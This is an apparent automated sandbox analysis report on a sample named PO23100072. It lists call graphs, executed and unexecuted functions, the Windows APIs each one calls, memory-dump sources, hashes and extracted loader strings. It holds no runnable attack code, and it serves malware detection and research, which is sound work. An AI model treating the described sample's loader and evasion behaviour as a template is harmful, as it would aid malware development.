93202->93204 93203 42cd4c 93203->93201 93204->93203 93209 42b8c3 93204->93209 93207 42e383 RtlFreeHeap 93208 42cdc5 93207->93208 93208->93201 93210 42b8e0 93209->93210 93213 17e2c0a 93210->93213 93211 42b90c 93211->93207 93214 17e2c1f LdrInitializeThunk 93213->93214 93215 17e2c11 93213->93215 93214->93211 93215->93211 93217 41ac2d 93216->93217 93221 41ad09 93216->93221 93222 42b963 93217->93222 93220 42c283 NtClose 93220->93221 93221->93184 93221->93185 93223 42b97d 93222->93223 93226 17e35c0 LdrInitializeThunk 93223->93226 93224 41acfd 93224->93220 93226->93224 93229 41823d 93227->93229 93228 41874b 93228->93194 93229->93228 93235 413833 93229->93235 93231 41836a 93231->93228 93232 42e383 RtlFreeHeap 93231->93232 93233 418382 93232->93233 93233->93228 93234 42c643 ExitProcess 93233->93234 93234->93228 93239 413853 93235->93239 93237 4138bc 93237->93231 93238 4138b2 93238->93231 93239->93237 93240 41b033 RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 93239->93240 93240->93238 93120 17e2b60 LdrInitializeThunk

                                                                Executed Functions

                                                                Function 004173A3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 334 4173a3-4173cc call 42f083 337 4173d2-4173e0 call 42f683 334->337 338 4173ce-4173d1 334->338 341 4173f0-417401 call 42da03 337->341 342 4173e2-4173ed call 42f923 337->342 347 417403-417417 LdrLoadDll 341->347 348 41741a-41741d 341->348 342->341 347->348
                                                                APIs
                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417415
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660331680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_PO23100072.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Load
                                                                • String ID:
                                                                • API String ID: 2234796835-0
                                                                • Opcode ID: dede90169ca1db16459994232f99263c7f2dcb4bb26b17399f27a86b55b0f282
                                                                • Instruction ID: 803bad41f6ba97ca028c5b6ebb90ab713b5e5efc40e90978f485b4949f8331b9
                                                                • Opcode Fuzzy Hash: dede90169ca1db16459994232f99263c7f2dcb4bb26b17399f27a86b55b0f282
                                                                • Instruction Fuzzy Hash: 7E015EB1E0420DBBDB10DAE5DC42FDEB7B89B54308F4081AAED0897241F634EB588B95
                                                                Function 0042C283 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 354 42c283-42c2bf call 404673 call 42d4f3 NtClose
                                                                APIs
                                                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C2BA
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660331680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_PO23100072.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Close
                                                                • String ID:
                                                                • API String ID: 3535843008-0
                                                                • Opcode ID: a3b23e781c8297b53f8e4474b48c3a032b94d0ec253a5db592d64cd3afe2f326
                                                                • Instruction ID: 3acc76f724e085259d6ac582d8d2a4bb54828ea73bc7891a87a57e5bec1fb20c
                                                                • Opcode Fuzzy Hash: a3b23e781c8297b53f8e4474b48c3a032b94d0ec253a5db592d64cd3afe2f326
                                                                • Instruction Fuzzy Hash: 85E04F726002147BD620BA5ADC41F97776CDBC6714F00441AFB0867241C6B5B91187F8
                                                                Function 017E2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 368 17e2b60-17e2b6c LdrInitializeThunk
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: a6349aaea2dee3298ecdb4214be2ea146f032dd24080b735fef10770f5b6d98e
                                                                • Instruction ID: 3d4a8ec41e7c5125418a31caa15521e9e0c31aded5a697a1c1e22df6d38b6ba9
                                                                • Opcode Fuzzy Hash: a6349aaea2dee3298ecdb4214be2ea146f032dd24080b735fef10770f5b6d98e
                                                                • Instruction Fuzzy Hash: FB90026120640003460572584414617800AD7E1201B55C035E20145B0DC625CAA56226
                                                                Function 017E2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 370 17e2df0-17e2dfc LdrInitializeThunk
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: c251702a7e8b9881835ee4f742cd28888b7120ca8ad03a637a1f93a5fbd86917
                                                                • Instruction ID: 74b6f3b3a86666f00cb9df0ec6169908ad52cb82c7ebdb690ff3d7a16a4c64a5
                                                                • Opcode Fuzzy Hash: c251702a7e8b9881835ee4f742cd28888b7120ca8ad03a637a1f93a5fbd86917
                                                                • Instruction Fuzzy Hash: BF90023120540413D611725845047074009D7D1241F95C426A1424578DD756CB66A222
                                                                Function 017E2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 369 17e2c70-17e2c7c LdrInitializeThunk
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 24fba69a6f457864d0088b9cc6bfa478ba7cfd189b10b3c6b498bcf452dad7dd
                                                                • Instruction ID: fc259d6c8cc1d04e0931c072ce0dc2f31e2177feab8edfe8dd191d80ce4db542
                                                                • Opcode Fuzzy Hash: 24fba69a6f457864d0088b9cc6bfa478ba7cfd189b10b3c6b498bcf452dad7dd
                                                                • Instruction Fuzzy Hash: 0690023120548802D6107258840474B4005D7D1301F59C425A5424678DC795CAA57222
                                                                Function 017E35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 3611bf545818435cd5ae7afadf8eb13cd94a957b45ee17a2d5bd64f7f6ea82f8
                                                                • Instruction ID: bc5051d7db882bb6646cb09198d71de92c57379df9630b1fc0031d5be351dbe0
                                                                • Opcode Fuzzy Hash: 3611bf545818435cd5ae7afadf8eb13cd94a957b45ee17a2d5bd64f7f6ea82f8
                                                                • Instruction Fuzzy Hash: 9290023160950402D600725845147075005D7D1201F65C425A1424578DC795CB6566A3
                                                                Function 00413BB5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63threadwindowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • PostThreadMessageW.USER32(A34E618M,00000111,00000000,00000000), ref: 00413C3A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660331680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_PO23100072.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: A34E618M$A34E618M
                                                                • API String ID: 1836367815-3667986552
                                                                • Opcode ID: 2be3bde86cb4d7dc141b6718e50ad7abfcbd0697461a34f352c73eabc8257f93
                                                                • Instruction ID: caa814e2df3becae4ab4015d96a0cbe41516eb01af2a68c1dd571b52ff96d7f3
                                                                • Opcode Fuzzy Hash: 2be3bde86cb4d7dc141b6718e50ad7abfcbd0697461a34f352c73eabc8257f93
                                                                • Instruction Fuzzy Hash: 7511C2B2D4015C7ADB11ABA18C81DEF7B7C9F41699F05805AFA14B7241D53C4F068BA1
                                                                Function 00413BC3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • PostThreadMessageW.USER32(A34E618M,00000111,00000000,00000000), ref: 00413C3A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660331680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_PO23100072.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: A34E618M$A34E618M
                                                                • API String ID: 1836367815-3667986552
                                                                • Opcode ID: 50c0b2199c71ebbef95a5cef98d5e0949c9d8ec523ae68ee7b4cf668f2c2b938
                                                                • Instruction ID: 92fdb82655a1d6a93dd9e1cc92e3bd6cbf280ac3eb93290fd97ea26f9d369f8b
                                                                • Opcode Fuzzy Hash: 50c0b2199c71ebbef95a5cef98d5e0949c9d8ec523ae68ee7b4cf668f2c2b938
                                                                • Instruction Fuzzy Hash: 3101C472D0011CBADB10AAE69C82DEFBB7CDF41798F058069FA14B7241E57C4F068BA5
                                                                Function 0042C5F3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 160 42c5f3-42c637 call 404673 call 42d4f3 RtlFreeHeap
                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C632
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660331680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_PO23100072.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID: `A
                                                                • API String ID: 3298025750-2149027389
                                                                • Opcode ID: acdd237a7a728e10ed32de03d3610bc6aa7b5a30a2fd813fd7ddd9c11810606e
                                                                • Instruction ID: ef4f435ce52e82b347afb479fc27a960a2fd8fe731e4cd794d162683faa6edbf
                                                                • Opcode Fuzzy Hash: acdd237a7a728e10ed32de03d3610bc6aa7b5a30a2fd813fd7ddd9c11810606e
                                                                • Instruction Fuzzy Hash: A1E092B1204204BBC614EE99EC45FAB37ACEFC5714F00441AFA09A7241D7B9B91087B8
                                                                Function 00417423 Relevance: 1.7, APIs: 1, Instructions: 158libraryloaderCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 305 417423-41743a 306 417440-41744a 305->306 307 4173f6-417401 306->307 308 41744c-41747f 306->308 310 417403-417417 LdrLoadDll 307->310 311 41741a-41741d 307->311 308->306 313 417481-4174ac 308->313 310->311 314 417512-417513 313->314 315 4174ae-4174c3 313->315 317 417501 315->317 318 4174c5-4174ce 315->318 319 4174d1-417500 318->319 320 41750e 318->320 319->317 321 417510 320->321 322 417514-41752b call 42f0e3 320->322 321->314 326 41752d-41755e call 42f0e3 call 42b263 322->326 327 41755f-41757f call 42b263 322->327
                                                                APIs
                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417415
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660331680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_PO23100072.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Load
                                                                • String ID:
                                                                • API String ID: 2234796835-0
                                                                • Opcode ID: 0e700db7e7ae3d175effefb3dd905522a701cb4ed781b9a175d105c238978748
                                                                • Instruction ID: 2bdc795f987955a10cd13a1914c58911e0966c6eebcaf474662c92624490cd5e
                                                                • Opcode Fuzzy Hash: 0e700db7e7ae3d175effefb3dd905522a701cb4ed781b9a175d105c238978748
                                                                • Instruction Fuzzy Hash: 85419C31A08345ABDB11DBB8DC81BEABBB8DF06758F0406EFFD448B142E6369545CB91
                                                                Function 0042C5A3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 349 42c5a3-42c5e4 call 404673 call 42d4f3 RtlAllocateHeap
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(?,0041E1BE,?,?,00000000,?,0041E1BE,?,?,?), ref: 0042C5DF
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660331680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_PO23100072.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: 6ae38073c7aa3304867fd0be910f8801875f33a6ff849def5cfbe6102455eb91
                                                                • Instruction ID: 369c668a4cc3a630eb3a9f8dc206576169b1919bd89476b6c8e575149a96f991
                                                                • Opcode Fuzzy Hash: 6ae38073c7aa3304867fd0be910f8801875f33a6ff849def5cfbe6102455eb91
                                                                • Instruction Fuzzy Hash: 40E06DB2604214BBD614EF59EC85F9B73ACEFC9714F004419FA08A7241E675B91087B8
                                                                Function 0042C643 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 359 42c643-42c67c call 404673 call 42d4f3 ExitProcess
                                                                APIs
                                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,6104CAEF,?,?,6104CAEF), ref: 0042C677
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660331680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_PO23100072.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExitProcess
                                                                • String ID:
                                                                • API String ID: 621844428-0
                                                                • Opcode ID: d07bb6d48f55c1af12db6d259e200f4b880b1beeb5d75b6632a6234d11049001
                                                                • Instruction ID: 55c01a96584f11098ac7db8d9c475956f6f860f285eb3010744f92bad983cb5b
                                                                • Opcode Fuzzy Hash: d07bb6d48f55c1af12db6d259e200f4b880b1beeb5d75b6632a6234d11049001
                                                                • Instruction Fuzzy Hash: F5E086312002547BD610FA5AEC41FEB775CDFC6714F40441AFA08A7282D675BA0187F4
                                                                Function 017E2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 364 17e2c0a-17e2c0f 365 17e2c1f-17e2c26 LdrInitializeThunk 364->365 366 17e2c11-17e2c18 364->366
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 1fdcfefc7d0969e85db29157ef8824090cb33c9324354dd062cd74acd2e58627
                                                                • Instruction ID: e459c39f64e16b2b85943c9682b89611a3127dd16eed8a43c9003c9788d0d412
                                                                • Opcode Fuzzy Hash: 1fdcfefc7d0969e85db29157ef8824090cb33c9324354dd062cd74acd2e58627
                                                                • Instruction Fuzzy Hash: B2B09B719055C5C5DF11E764460C717B954B7D5701F15C075D3030652F4738C1E5E276

                                                                Non-executed Functions

                                                                Function 01822349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-2160512332
                                                                • Opcode ID: 3370b0c79cc6af109aebda36bf76147de2f193e5f961144e6cfe0a32d319c95e
                                                                • Instruction ID: 8af1926595144e664719099c543d6239645a31c6f83af2fda7198fb7c8928c53
                                                                • Opcode Fuzzy Hash: 3370b0c79cc6af109aebda36bf76147de2f193e5f961144e6cfe0a32d319c95e
                                                                • Instruction Fuzzy Hash: 5B92E371604352AFE722CF28C884F6BB7E9BB88714F04492DFA94D7251D770EA84CB52
                                                                Function 017D8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • Invalid debug info address of this critical section, xrefs: 018154B6
                                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0181540A, 01815496, 01815519
                                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018154CE
                                                                • Critical section debug info address, xrefs: 0181541F, 0181552E
                                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018154E2
                                                                • Thread identifier, xrefs: 0181553A
                                                                • Address of the debug info found in the active list., xrefs: 018154AE, 018154FA
                                                                • double initialized or corrupted critical section, xrefs: 01815508
                                                                • corrupted critical section, xrefs: 018154C2
                                                                • undeleted critical section in freed memory, xrefs: 0181542B
                                                                • 8, xrefs: 018152E3
                                                                • Thread is in a state in which it cannot own a critical section, xrefs: 01815543
                                                                • Critical section address., xrefs: 01815502
                                                                • Critical section address, xrefs: 01815425, 018154BC, 01815534
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                • API String ID: 0-2368682639
                                                                • Opcode ID: a64d938aae27370ced7129eb08e7b3357543e7c48eb416baa0db35d11cd753cd
                                                                • Instruction ID: db0cd0de0ea2dabeb252157a6494e28ae737315525ad82744414c8c8d37dbc90
                                                                • Opcode Fuzzy Hash: a64d938aae27370ced7129eb08e7b3357543e7c48eb416baa0db35d11cd753cd
                                                                • Instruction Fuzzy Hash: 8581ADB2A80348EFDB20CF99C854BAEFBB9BB49714F544119F504F7685D371AA40CB91
                                                                Function 017D29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01812506
                                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01812409
                                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018124C0
                                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018122E4
                                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01812602
                                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 0181261F
                                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01812498
                                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01812412
                                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018125EB
                                                                • @, xrefs: 0181259B
                                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01812624
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                • API String ID: 0-4009184096
                                                                • Opcode ID: 159438d2c73410483c86874a606c57efd151670b0af3099b3fcd80cf20afff51
                                                                • Instruction ID: 0bff5b4e52c41f9f11f252153d8381a95195ca85b7903b323f6f691ad1b6a74a
                                                                • Opcode Fuzzy Hash: 159438d2c73410483c86874a606c57efd151670b0af3099b3fcd80cf20afff51
                                                                • Instruction Fuzzy Hash: 38026EF2D002299BDB21DB54CC84BDAF7B8AB54704F1041DAE60DA7246EB709F85CF59
                                                                Function 01848B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                • API String ID: 0-2515994595
                                                                • Opcode ID: 6e5f8f03f5957edf70b373030a5b55bddc7efbf5a7d230236879ddfaaf0042e4
                                                                • Instruction ID: 5b11e349eb1539affaa253d6224e38101eef20c4b79da48520774aef80490471
                                                                • Opcode Fuzzy Hash: 6e5f8f03f5957edf70b373030a5b55bddc7efbf5a7d230236879ddfaaf0042e4
                                                                • Instruction Fuzzy Hash: 1851CEB15093099BC729DF58C848BABBBE8EF95344F14492DE999C3241EB70D604CB96
                                                                Function 01850274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                • API String ID: 0-1700792311
                                                                • Opcode ID: 16eef42e35897a9cfe0ed727799daf385c67720d2541158dda97b48029461310
                                                                • Instruction ID: 1409db73d74ced25fe829667a40be196cfba52db31bbbf0763e4cd3842ae7b6d
                                                                • Opcode Fuzzy Hash: 16eef42e35897a9cfe0ed727799daf385c67720d2541158dda97b48029461310
                                                                • Instruction Fuzzy Hash: DDD1CA7150068AEFDB62DF68D494AAEFBF1FF49718F088049F8459B312C7349A85CB10
                                                                Function 018289B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • VerifierDlls, xrefs: 01828CBD
                                                                • VerifierDebug, xrefs: 01828CA5
                                                                • HandleTraces, xrefs: 01828C8F
                                                                • VerifierFlags, xrefs: 01828C50
                                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01828A3D
                                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01828A67
                                                                • AVRF: -*- final list of providers -*- , xrefs: 01828B8F
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                • API String ID: 0-3223716464
                                                                • Opcode ID: 3cdba77b6551707215038fd198ff2c64ac01dc10ade1584a87f916c71cf5ae2a
                                                                • Instruction ID: 29775bbd1fe31c951cd8018c090955bd3ee2bcce6d09112f024b4ac44e676da0
                                                                • Opcode Fuzzy Hash: 3cdba77b6551707215038fd198ff2c64ac01dc10ade1584a87f916c71cf5ae2a
                                                                • Instruction Fuzzy Hash: FF914871A453269FEB23DF68C880B1AB7E4AB56B14F09045DFA41EB241C7709B84CB91
                                                                Function 017AEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                • API String ID: 0-1109411897
                                                                • Opcode ID: 3f1dde68de39c76be59161bcd304b477d2e5027aad8928fac2069f9d60fa57f3
                                                                • Instruction ID: 34346c81525637b59a0d8f946af4884f9f2eff56466dc3f9fca8a4001475ddfd
                                                                • Opcode Fuzzy Hash: 3f1dde68de39c76be59161bcd304b477d2e5027aad8928fac2069f9d60fa57f3
                                                                • Instruction Fuzzy Hash: A6A23B74A0562A8FDB65DF18CC887ADFBB5AF85304F5442E9D90DA7290DB309E85CF40
                                                                Function 017D63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-792281065
